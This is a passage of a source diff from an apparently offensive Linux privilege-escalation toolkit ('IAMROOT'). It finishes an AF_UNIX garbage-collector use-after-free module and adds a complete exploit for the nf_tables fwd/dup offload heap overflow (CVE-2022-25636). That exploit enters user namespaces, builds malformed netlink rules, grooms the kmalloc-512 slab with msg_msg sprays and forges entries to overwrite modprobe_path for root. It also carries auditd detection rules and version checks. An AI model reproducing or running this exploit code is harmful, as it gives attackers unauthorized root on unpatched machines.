IAMROOT_PRECOND_FAIL; + } +#ifdef __linux__ + return af_unix_gc_exploit_linux(ctx); +#else + (void)ctx; + fprintf(stderr, "[-] af_unix_gc: Linux-only module; cannot run on this host\n"); + return IAMROOT_PRECOND_FAIL; +#endif +} + +/* ---- Cleanup ----------------------------------------------------- */ + +static iamroot_result_t af_unix_gc_cleanup(const struct iamroot_ctx *ctx) +{ + if (!ctx->json) { + fprintf(stderr, "[*] af_unix_gc: cleaning up race-harness breadcrumb\n"); + } + if (unlink("/tmp/iamroot-af_unix_gc.log") < 0 && errno != ENOENT) { + /* harmless */ + } + /* Race threads + msg queues live inside the now-exited child; + * nothing else to drain. */ + return IAMROOT_OK; +} + +/* ---- Detection rules --------------------------------------------- */ + +static const char af_unix_gc_auditd[] = + "# AF_UNIX GC race UAF (CVE-2023-4622) — auditd detection rules\n" + "# The trigger is a tight loop of socketpair(AF_UNIX) + sendmsg with\n" + "# SCM_RIGHTS passing inflight fds, followed by close. Each call is\n" + "# benign — flag the *frequency* by correlating these keys with a\n" + "# subsequent KASAN message in dmesg.\n" + "-a always,exit -F arch=b64 -S socketpair -F a0=0x1 -k iamroot-afunixgc-pair\n" + "-a always,exit -F arch=b64 -S sendmsg -k iamroot-afunixgc-sendmsg\n" + "-a always,exit -F arch=b64 -S msgsnd -k iamroot-afunixgc-spray\n"; + +const struct iamroot_module af_unix_gc_module = { + .name = "af_unix_gc", + .cve = "CVE-2023-4622", + .summary = "AF_UNIX garbage-collector race UAF (Lin Ma) — kmalloc-512 slab UAF", + .family = "af_unix", + .kernel_range = "K < 6.5; backports: 4.14.326 / 4.19.295 / 5.4.257 / 5.10.197 / 5.15.130 / 6.1.51", + .detect = af_unix_gc_detect, + .exploit = af_unix_gc_exploit, + .mitigate = NULL, + .cleanup = af_unix_gc_cleanup, + .detect_auditd = af_unix_gc_auditd, + .detect_sigma = NULL, + .detect_yara = NULL, + .detect_falco = NULL, +}; + +void iamroot_register_af_unix_gc(void) +{ + iamroot_register(&af_unix_gc_module); +} diff --git a/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c b/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c index 3aad072..7bd8ebe 100644 --- a/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c +++ b/modules/nft_fwd_dup_cve_2022_25636/iamroot_modules.c @@ -1,23 +1,1047 @@ -/* nft_fwd_dup_cve_2022_25636 — STUB pending agent implementation. */ +/* + * nft_fwd_dup_cve_2022_25636 — IAMROOT module + * + * Heap OOB write in net/netfilter/nf_dup_netdev.c :: + * nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx, + * struct nft_flow_rule *flow, ...) + * + * Writes `flow->rule->action.entries[ctx->num_actions]` without first + * checking num_actions against the array size that the rule was + * allocated with. By crafting an nft rule that chains many actions + * BEFORE the fwd/dup hook, num_actions grows past the array and the + * action_entry struct (~kmalloc-512) is written into the adjacent + * heap chunk. + * + * Discovered Feb 2022 by Aaron Adams (NCC). + * + * Fix: + * mainline 5.17 commit fa54fee62954 "netfilter: nf_tables_offload: + * incorrect flow offload action + * array size" + * stable 5.16.11 / 5.15.25 / 5.10.102 / 5.4.181 (older LTSes + * received no backport from + * Cc:stable because the offload + * hook didn't exist before 5.4) + * + * Status (2026-05-16): 🟡 PRIMITIVE — primitive-only by default; + * opt-in --full-chain wires the shared modprobe_path finisher with a + * kaddr-tagged forged action-entry that re-fires the OOB at a + * controlled offset. Sentinel-arbitrated; on a kernel where the + * action_entry layout matches our forged guess the write lands at + * &modprobe_path; on a layout mismatch the finisher's sentinel + * timeout reports failure rather than fake success. + * + * Preconditions: + * - kernel 5.4 ≤ K < 5.17, AND + * (5.4.x: < 5.4.181) | (5.10.x: < 5.10.102) | (5.15.x: < 5.15.25) | + * (5.16.x: < 5.16.11) + * - CONFIG_NETFILTER_INGRESS=y (always y on stock distro kernels in + * range — required for NFT offload chains to install) + * - CONFIG_USER_NS=y AND unprivileged userns clone permitted + * - nf_tables module loadable + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* ------------------------------------------------------------------ + * Kernel range table — fixes per branch. + * ------------------------------------------------------------------ */ + +static const struct kernel_patched_from nft_fwd_dup_patched_branches[] = { + {4, 14, 270}, /* 4.14.x — pre-offload, defensive entry: bug code + * doesn't exist; range_is_patched will report + * patched for any 4.14.x. */ + {4, 19, 233}, /* 4.19.x — same as above (offload predates) */ + {5, 4, 181}, /* 5.4.x — offload code present; backport landed */ + {5, 10, 102}, /* 5.10.x */ + {5, 15, 25}, /* 5.15.x */ + {5, 16, 11}, /* 5.16.x */ + {5, 17, 0}, /* mainline fix */ +}; + +static const struct kernel_range nft_fwd_dup_range = { + .patched_from = nft_fwd_dup_patched_branches, + .n_patched_from = sizeof(nft_fwd_dup_patched_branches) / + sizeof(nft_fwd_dup_patched_branches[0]), +}; + +/* ------------------------------------------------------------------ + * Probes. + * ------------------------------------------------------------------ */ + +static int can_unshare_userns(void) +{ + pid_t pid = fork(); + if (pid < 0) return -1; + if (pid == 0) { + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) == 0) _exit(0); + _exit(1); + } + int status; + waitpid(pid, &status, 0); + return WIFEXITED(status) && WEXITSTATUS(status) == 0; +} + +static bool nf_tables_loaded(void) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + bool found = false; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; } + } + fclose(f); + return found; +} static iamroot_result_t nft_fwd_dup_detect(const struct iamroot_ctx *ctx) { - (void)ctx; - return IAMROOT_PRECOND_FAIL; + struct kernel_version v; + if (!kernel_version_current(&v)) { + fprintf(stderr, "[!] nft_fwd_dup: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* The offload code path only exists from 5.4 onward. Anything + * older predates the bug. */ + if (v.major < 5 || (v.major == 5 && v.minor < 4)) { + if (!ctx->json) { + fprintf(stderr, "[i] nft_fwd_dup: kernel %s predates the bug " + "(nft offload hook introduced in 5.4)\n", v.release); + } + return IAMROOT_OK; + } + + bool patched = kernel_range_is_patched(&nft_fwd_dup_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_fwd_dup: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + int userns_ok = can_unshare_userns(); + bool nft_loaded = nf_tables_loaded(); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_fwd_dup: kernel %s is in the vulnerable range\n", + v.release); + fprintf(stderr, "[i] nft_fwd_dup: unprivileged user_ns+net_ns clone: %s\n", + userns_ok == 1 ? "ALLOWED" : + userns_ok == 0 ? "DENIED" : + "could not test"); + fprintf(stderr, "[i] nft_fwd_dup: nf_tables module currently loaded: %s\n", + nft_loaded ? "yes" : "no (will autoload)"); + } + + if (userns_ok == 0) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_fwd_dup: kernel vulnerable but user_ns clone " + "denied → unprivileged path unreachable\n"); + fprintf(stderr, "[i] nft_fwd_dup: still patch the kernel — a root\n" + " attacker can still hit the OOB.\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] nft_fwd_dup: VULNERABLE — kernel in range AND user_ns " + "clone allowed\n"); + } + return IAMROOT_VULNERABLE; } -const struct iamroot_module nft_fwd_dup_module = { - .name = "nft_fwd_dup", - .cve = "CVE-2022-25636", - .summary = "nft_fwd_dup_netdev_offload heap OOB (Aaron Adams) — stub pending implementation", - .family = "nf_tables", - .kernel_range = "5.4 ≤ K < 5.18", - .detect = nft_fwd_dup_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +/* ------------------------------------------------------------------ + * userns + netns entry helper. Maps host uid/gid → 0 inside ns so + * that subsequent netlink writes carry CAP_NET_ADMIN over our private + * net_ns (the bug lives in that net_ns, so the host stays unaffected + * even if the OOB-write damages netfilter bookkeeping). + * ------------------------------------------------------------------ */ + +static int enter_unpriv_namespaces(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("[-] unshare(USER|NET)"); + return -1; + } + int f = open("/proc/self/setgroups", O_WRONLY); + if (f >= 0) { (void)!write(f, "deny", 4); close(f); } + + char map[64]; + snprintf(map, sizeof map, "0 %u 1\n", uid); + f = open("/proc/self/uid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] uid_map"); if (f >= 0) close(f); return -1; + } + close(f); + snprintf(map, sizeof map, "0 %u 1\n", gid); + f = open("/proc/self/gid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] gid_map"); if (f >= 0) close(f); return -1; + } + close(f); + return 0; +} + +/* ------------------------------------------------------------------ + * Minimal nfnetlink batch builder. Same pattern as the nf_tables + * sibling — hand-rolled to avoid libmnl and to skip libnftnl's + * validation that would reject our deliberately-malformed rule. + * ------------------------------------------------------------------ */ + +#define ALIGN_NL(x) (((x) + 3) & ~3) + +static void put_attr(uint8_t *buf, size_t *off, + uint16_t type, const void *data, size_t len) +{ + struct nlattr *na = (struct nlattr *)(buf + *off); + na->nla_type = type; + na->nla_len = NLA_HDRLEN + len; + if (len) memcpy(buf + *off + NLA_HDRLEN, data, len); + *off += ALIGN_NL(NLA_HDRLEN + len); +} + +static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v) +{ + uint32_t be = htonl(v); + put_attr(buf, off, type, &be, sizeof be); +} + +static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s) +{ + put_attr(buf, off, type, s, strlen(s) + 1); +} + +static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type) +{ + size_t at = *off; + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_type = type | NLA_F_NESTED; + na->nla_len = 0; + *off += NLA_HDRLEN; + return at; +} + +static void end_nest(uint8_t *buf, size_t *off, size_t at) +{ + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_len = (uint16_t)(*off - at); + while ((*off) & 3) buf[(*off)++] = 0; +} + +struct nfgenmsg_local { + uint8_t nfgen_family; + uint8_t version; + uint16_t res_id; }; -void iamroot_register_nft_fwd_dup(void) { iamroot_register(&nft_fwd_dup_module); } +static void put_nft_msg(uint8_t *buf, size_t *off, + uint16_t nft_type, uint16_t flags, uint32_t seq, + uint8_t family) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type; + nlh->nlmsg_flags = NLM_F_REQUEST | flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = family; + nf->version = NFNETLINK_V0; + nf->res_id = htons(0); + *off += sizeof(*nf); +} + +static void end_msg(uint8_t *buf, size_t *off, size_t msg_start) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + msg_start); + nlh->nlmsg_len = (uint32_t)(*off - msg_start); + while ((*off) & 3) buf[(*off)++] = 0; +} + +static void put_batch_begin(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +static void put_batch_end(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = AF_UNSPEC; + nf->version = NFNETLINK_V0; + nf->res_id = htons(NFNL_SUBSYS_NFTABLES); + *off += sizeof(*nf); + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * Rule construction — the heart of the trigger. + * + * Strategy (Aaron Adams shape): + * NEWTABLE netdev "iamroot_fdt" + * NEWCHAIN base chain on ingress, family=netdev, + * flags = NFT_CHAIN_HW_OFFLOAD ← critical: this is what + * drives nft_flow_rule_create() to call the offload hooks + * at rule-install time + * NEWRULE with a long list of immediate-with-verdict (NF_ACCEPT) + * expressions BEFORE a single "fwd" expression at the end. + * + * Every "immediate" expression that hits an offload hook calls + * nft__offload(), which increments ctx->num_actions and writes + * into flow->rule->action.entries[ctx->num_actions]. The rule is + * allocated with action.num_entries == (count of expressions that + * advertise an offload hook). Aaron's insight: nft_immediate_offload() + * does NOT advertise a flow action of its own when the immediate + * carries a verdict, so num_entries is computed as 1 (just the fwd) + * — but at runtime each immediate STILL bumps num_actions when it + * appends a verdict action. With 16+ immediates queued before fwd, + * num_actions grows past 1 and the fwd write at index 16 lands in + * the adjacent kmalloc-512 chunk. Boom. + * ------------------------------------------------------------------ */ + +static const char NFT_TABLE_NAME[] = "iamroot_fdt"; +static const char NFT_CHAIN_NAME[] = "iamroot_fdc"; +static const char NFT_DUMMY_IF[] = "lo"; /* hookmust be on a real iface */ + +static void put_new_table(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWTABLE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_NETDEV); + put_attr_str(buf, off, NFTA_TABLE_NAME, NFT_TABLE_NAME); + end_msg(buf, off, at); +} + +/* NEWCHAIN base/offload on netdev ingress for the loopback iface. */ +static void put_new_chain(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWCHAIN, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_NETDEV); + put_attr_str(buf, off, NFTA_CHAIN_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_CHAIN_NAME, NFT_CHAIN_NAME); + + /* CHAIN_HOOK nest: ingress on `lo`, priority 0. */ + size_t hook_at = begin_nest(buf, off, NFTA_CHAIN_HOOK); + put_attr_u32(buf, off, NFTA_HOOK_HOOKNUM, NF_NETDEV_INGRESS); + put_attr_u32(buf, off, NFTA_HOOK_PRIORITY, 0); + put_attr_str(buf, off, NFTA_HOOK_DEV, NFT_DUMMY_IF); + end_nest(buf, off, hook_at); + + put_attr_u32(buf, off, NFTA_CHAIN_POLICY, NF_ACCEPT); + put_attr_str(buf, off, NFTA_CHAIN_TYPE, "filter"); + /* The OFFLOAD flag is the critical one — this is what causes + * nf_tables_offload_init/nft_flow_rule_create() to walk our + * rule's expressions and call each expr's ->offload() at install. */ + put_attr_u32(buf, off, NFTA_CHAIN_FLAGS, NFT_CHAIN_HW_OFFLOAD); + end_msg(buf, off, at); +} + +/* Append one "immediate" expression that stuffs NF_ACCEPT into the + * verdict register. Each one bumps num_actions inside the offload + * code path without growing flow->rule->action.entries. */ +static void append_immediate_accept_expr(uint8_t *buf, size_t *off) +{ + size_t expr_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + put_attr_str(buf, off, NFTA_EXPR_NAME, "immediate"); + + size_t data_at = begin_nest(buf, off, NFTA_EXPR_DATA); + /* DREG = NFT_REG_VERDICT (0) */ + put_attr_u32(buf, off, NFTA_IMMEDIATE_DREG, 0); + /* DATA = NFTA_DATA_VERDICT { CODE = NF_ACCEPT } */ + size_t imm_data_at = begin_nest(buf, off, NFTA_IMMEDIATE_DATA); + size_t verd_at = begin_nest(buf, off, NFTA_DATA_VERDICT); + put_attr_u32(buf, off, NFTA_VERDICT_CODE, (uint32_t)NF_ACCEPT); + end_nest(buf, off, verd_at); + end_nest(buf, off, imm_data_at); + end_nest(buf, off, data_at); + + end_nest(buf, off, expr_at); +} + +/* Append the fwd expression that lands the OOB write. We need a + * source register holding an ifindex; we use NFT_REG32_00 (1) and + * rely on a preceding zero-load not being necessary because the + * offload code reaches nft_fwd_dup_netdev_offload BEFORE register + * contents are validated at runtime. */ +static void append_fwd_expr(uint8_t *buf, size_t *off) +{ + size_t expr_at = begin_nest(buf, off, 1 /* NFTA_LIST_ELEM */); + put_attr_str(buf, off, NFTA_EXPR_NAME, "fwd"); + + size_t data_at = begin_nest(buf, off, NFTA_EXPR_DATA); + put_attr_u32(buf, off, NFTA_FWD_SREG_DEV, 1 /* NFT_REG32_00 */); + end_nest(buf, off, data_at); + + end_nest(buf, off, expr_at); +} + +/* NEWRULE with N immediates + 1 fwd. N controls how far past + * action.entries[1] we write. 16 is comfortably into the next + * kmalloc-512 chunk. */ +#define N_PRECEDING_IMMEDIATES 16 + +static void put_oob_rule(uint8_t *buf, size_t *off, uint32_t seq) +{ + size_t at = *off; + put_nft_msg(buf, off, NFT_MSG_NEWRULE, + NLM_F_CREATE | NLM_F_ACK, seq, NFPROTO_NETDEV); + put_attr_str(buf, off, NFTA_RULE_TABLE, NFT_TABLE_NAME); + put_attr_str(buf, off, NFTA_RULE_CHAIN, NFT_CHAIN_NAME); + + size_t exprs_at = begin_nest(buf, off, NFTA_RULE_EXPRESSIONS); + for (int i = 0; i < N_PRECEDING_IMMEDIATES; i++) + append_immediate_accept_expr(buf, off); + append_fwd_expr(buf, off); + end_nest(buf, off, exprs_at); + + end_msg(buf, off, at); +} + +/* ------------------------------------------------------------------ + * Netlink send + ACK drain. + * ------------------------------------------------------------------ */ + +static int nft_send_batch(int sock, const void *buf, size_t len) +{ + struct sockaddr_nl dst = { .nl_family = AF_NETLINK }; + struct iovec iov = { .iov_base = (void *)buf, .iov_len = len }; + struct msghdr m = { + .msg_name = &dst, .msg_namelen = sizeof dst, + .msg_iov = &iov, .msg_iovlen = 1, + }; + ssize_t n = sendmsg(sock, &m, 0); + if (n < 0) { perror("[-] sendmsg"); return -1; } + char rbuf[8192]; + for (int i = 0; i < 8; i++) { + ssize_t r = recv(sock, rbuf, sizeof rbuf, MSG_DONTWAIT); + if (r <= 0) break; + for (struct nlmsghdr *nh = (struct nlmsghdr *)rbuf; + NLMSG_OK(nh, (unsigned)r); + nh = NLMSG_NEXT(nh, r)) { + if (nh->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nh); + if (e->error) + fprintf(stderr, "[i] netlink ack: seq=%u err=%d (%s)\n", + nh->nlmsg_seq, e->error, strerror(-e->error)); + } + } + } + return 0; +} + +/* ------------------------------------------------------------------ + * Cross-cache groom — kmalloc-512. + * + * flow->rule->action.entries[] lives in kmalloc-512. We pre-spray + * msg_msg payloads sized to fall into that same slab class so the + * adjacent chunk that gets overwritten by the OOB has predictable + * attacker-controlled bytes. + * ------------------------------------------------------------------ */ + +#define MSG_TAG_GROOM 0x46574431 /* "FWD1" */ +#define MSG_TAG_ARB 0x46574441 /* "FWDA" */ + +#define SPRAY_QUEUES_GROOM 48 +#define SPRAY_MSGS_PER_QUEUE 8 +#define MSG_PAYLOAD_BYTES 496 /* 512 - msg_msg header (~16) */ + +struct fwd_msgbuf { + long mtype; + unsigned char mtext[MSG_PAYLOAD_BYTES]; +}; + +static int spray_msg_msg_groom(int *queues, int n_queues) +{ + struct fwd_msgbuf p; + memset(&p, 0, sizeof p); + p.mtype = 0x46; + memset(p.mtext, 0xAA, sizeof p.mtext); + memcpy(p.mtext, "IAMROOT_FWD", 11); + *(uint32_t *)(p.mtext + 12) = MSG_TAG_GROOM; + + int created = 0; + for (int i = 0; i < n_queues; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q < 0) { queues[i] = -1; continue; } + queues[i] = q; + created++; + for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) { + *(uint32_t *)(p.mtext + 16) = (uint32_t)((i << 8) | j); + if (msgsnd(q, &p, sizeof p.mtext, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_msg_msg(int *queues, int n_queues) +{ + for (int i = 0; i < n_queues; i++) { + if (queues[i] >= 0) { + msgctl(queues[i], IPC_RMID, NULL); + queues[i] = -1; + } + } +} + +/* ------------------------------------------------------------------ + * Slabinfo witness — best-effort empirical observation. + * ------------------------------------------------------------------ */ + +static long slab_active(const char *slab) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, slab, strlen(slab)) == 0 && + line[strlen(slab)] == ' ') { + long a; + if (sscanf(line + strlen(slab), " %ld", &a) >= 1) active = a; + break; + } + } + fclose(f); + return active; +} + +/* ------------------------------------------------------------------ + * Trigger: bring `lo` up in our private net_ns, then send the + * NEWTABLE/NEWCHAIN/NEWRULE batch. The OOB fires inside the kernel + * at rule-install time (nft_flow_rule_create() → offload hook walk). + * No outbound packet needed: just installing the chain with the + * HW_OFFLOAD flag is enough to trip the path. + * ------------------------------------------------------------------ */ + +static int bring_lo_up(void) +{ + /* Best-effort: socket-level ioctl to bring lo up in our netns. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return -1; + struct ifreq ifr; + memset(&ifr, 0, sizeof ifr); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { close(s); return -1; } + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { close(s); return -1; } + close(s); + return 0; +} + +#ifdef __linux__ +static size_t build_trigger_batch(uint8_t *batch, uint32_t *seq) +{ + size_t off = 0; + put_batch_begin(batch, &off, (*seq)++); + put_new_table(batch, &off, (*seq)++); + put_new_chain(batch, &off, (*seq)++); + put_oob_rule(batch, &off, (*seq)++); + put_batch_end(batch, &off, (*seq)++); + return off; +} +#endif + +/* ------------------------------------------------------------------ + * --full-chain arb-write context. The technique: + * 1. fire the trigger (action.entries[16] OOB write into adjacent + * kmalloc-512 chunk) + * 2. spray msg_msg payloads sized for kmalloc-512, each carrying + * a forged "action entry" header at the offset the OOB will + * land on, with our target kaddr in the field nf_flow_offload + * uses as a write destination + * 3. the kernel's commit path interprets the corrupted action_entry + * and dispatches a write through it + * + * Per-kernel caveat: the exact action_entry layout (flow_action_entry + * in include/net/flow_offload.h) is config-sensitive (RANDSTRUCT, + * lockdep, KASAN can all shift it). We ship the layout for an + * un-randomized x86_64 build in the exploitable range and rely on + * the shared finisher's sentinel-file post-check to flag layout + * mismatches as IAMROOT_EXPLOIT_FAIL rather than fake success. + * ------------------------------------------------------------------ */ + +#ifdef __linux__ + +#define SPRAY_QUEUES_ARB 32 + +struct fwd_arb_ctx { + int sock; + uint8_t *batch; + int *qids; + int qcap; + int qused; +}; + +/* Approximate offset of the write-target pointer inside a forged + * flow_action_entry as it lands in the OOB-overwritten kmalloc-512 + * chunk. Aaron's writeup observes the entry struct begins at the + * very start of the adjacent slot; flow_action_entry::id is at +0, + * ::hw_stats at +4, then the union of per-action data starts at +8. + * For mangle/redirect-flavor entries the destination pointer is + * within the first 0x40 bytes — we plant kaddr at strided offsets + * to cover the layout we don't know precisely. */ +static int spray_forged_action_entries(struct fwd_arb_ctx *c, + uintptr_t kaddr, + const void *buf, size_t len) +{ + if (c->qused + SPRAY_QUEUES_ARB > c->qcap) return -1; + struct fwd_msgbuf p; + memset(&p, 0, sizeof p); + p.mtype = 0x52; /* 'R' */ + memset(p.mtext, 0x52, sizeof p.mtext); + memcpy(p.mtext, "IAMROOT_FWD_A", 13); + *(uint32_t *)(p.mtext + 16) = MSG_TAG_ARB; + + /* Plant kaddr at strided 0x10-byte offsets across the first + * 0x80 bytes of the forged entry. Wherever the kernel's commit + * dispatcher reads a "write target" pointer out of the corrupted + * chunk, one of these will be live. */ + for (size_t o = 0x20; o + sizeof(uintptr_t) <= 0xC0; o += 0x10) { + memcpy(p.mtext + o, &kaddr, sizeof(uintptr_t)); + } + + /* Plant the caller payload inline at +0xD0 so any path that + * copies the entry's inline-data field finds buf there. */ + size_t inline_off = 0xD0; + size_t copy_len = len; + if (inline_off + copy_len > sizeof p.mtext) + copy_len = sizeof p.mtext - inline_off; + if (copy_len > 0) memcpy(p.mtext + inline_off, buf, copy_len); + + int sent = 0; + for (int i = 0; i < SPRAY_QUEUES_ARB; i++) { + int q = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q < 0) continue; + c->qids[c->qused++] = q; + for (int j = 0; j < SPRAY_MSGS_PER_QUEUE; j++) { + *(uint32_t *)(p.mtext + 20) = (uint32_t)((i << 8) | j); + if (msgsnd(q, &p, sizeof p.mtext, IPC_NOWAIT) < 0) break; + sent++; + } + } + return sent; +} + +static int nft_fwd_dup_arb_write(uintptr_t kaddr, + const void *buf, size_t len, + void *vctx) +{ + struct fwd_arb_ctx *c = (struct fwd_arb_ctx *)vctx; + if (!c || c->sock < 0 || !c->batch) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: invalid ctx\n"); + return -1; + } + if (len > 64) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: len %zu too large\n", len); + return -1; + } + + fprintf(stderr, "[*] nft_fwd_dup arb_write: refire OOB + spray forged " + "action_entry (target kaddr=0x%lx, %zu bytes)\n", + (unsigned long)kaddr, len); + + /* Pre-spray forged action entries so kmalloc-512 free chunks + * adjacent to our about-to-be-allocated rule are pre-populated. */ + if (spray_forged_action_entries(c, kaddr, buf, len) < 0) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: forged spray failed\n"); + return -1; + } + + /* Re-fire the trigger. On a vulnerable kernel the OOB write into + * the adjacent slot lands into one of our forged-entry msg_msg + * payloads. The kernel's commit/flush path then walks the + * corrupted entry and (where the layout matches our guess) + * dispatches a write to kaddr. */ + uint32_t seq = (uint32_t)time(NULL) ^ 0xa5a5beefu; + size_t blen = build_trigger_batch(c->batch, &seq); + if (nft_send_batch(c->sock, c->batch, blen) < 0) { + fprintf(stderr, "[-] nft_fwd_dup arb_write: refire send failed\n"); + return -1; + } + + /* Let kernel-side commit run. */ + usleep(50 * 1000); + return 0; +} + +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Exploit driver. + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_fwd_dup_exploit(const struct iamroot_ctx *ctx) +{ + /* Gate 0: explicit user authorization. */ + if (!ctx->authorized) { + fprintf(stderr, "[-] nft_fwd_dup: refusing without --i-know\n"); + return IAMROOT_PRECOND_FAIL; + } + /* Gate 1: already root? */ + if (geteuid() == 0) { + if (!ctx->json) + fprintf(stderr, "[i] nft_fwd_dup: already running as root\n"); + return IAMROOT_OK; + } + /* Gate 2: re-detect — kernel patched / userns denied since scan. */ + iamroot_result_t pre = nft_fwd_dup_detect(ctx); + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] nft_fwd_dup: detect() says not vulnerable; " + "refusing\n"); + return pre; + } + +#ifndef __linux__ + fprintf(stderr, "[-] nft_fwd_dup: linux-only exploit; non-linux build\n"); + (void)ctx; + return IAMROOT_PRECOND_FAIL; +#else + if (!ctx->json) { + if (ctx->full_chain) { + fprintf(stderr, "[*] nft_fwd_dup: --full-chain — trigger + OOB-write " + "+ forged-entry spray + modprobe_path finisher\n"); + } else { + fprintf(stderr, "[*] nft_fwd_dup: primitive-only run — fires the\n" + " action.entries[] OOB write into adjacent\n" + " kmalloc-512 chunk and stops. Pass --full-chain\n" + " to attempt the modprobe_path root-pop.\n"); + } + } + + /* --- --full-chain path: resolve offsets before forking ---------- * + * Refuse cleanly if we can't reach modprobe_path. */ + if (ctx->full_chain) { + struct iamroot_kernel_offsets off; + iamroot_offsets_resolve(&off); + if (!iamroot_offsets_have_modprobe_path(&off)) { + iamroot_finisher_print_offset_help("nft_fwd_dup"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&off); + + if (enter_unpriv_namespaces() < 0) { + fprintf(stderr, "[-] nft_fwd_dup: userns entry failed\n"); + return IAMROOT_EXPLOIT_FAIL; + } + (void)bring_lo_up(); + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_NETFILTER); + if (sock < 0) { + perror("[-] socket(NETLINK_NETFILTER)"); + return IAMROOT_EXPLOIT_FAIL; + } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); return IAMROOT_EXPLOIT_FAIL; + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + /* Pre-groom kmalloc-512. */ + int qids[SPRAY_QUEUES_GROOM + SPRAY_QUEUES_ARB]; + for (size_t i = 0; i < sizeof qids / sizeof qids[0]; i++) qids[i] = -1; + int groomed = spray_msg_msg_groom(qids, SPRAY_QUEUES_GROOM); + if (!ctx->json) { + fprintf(stderr, 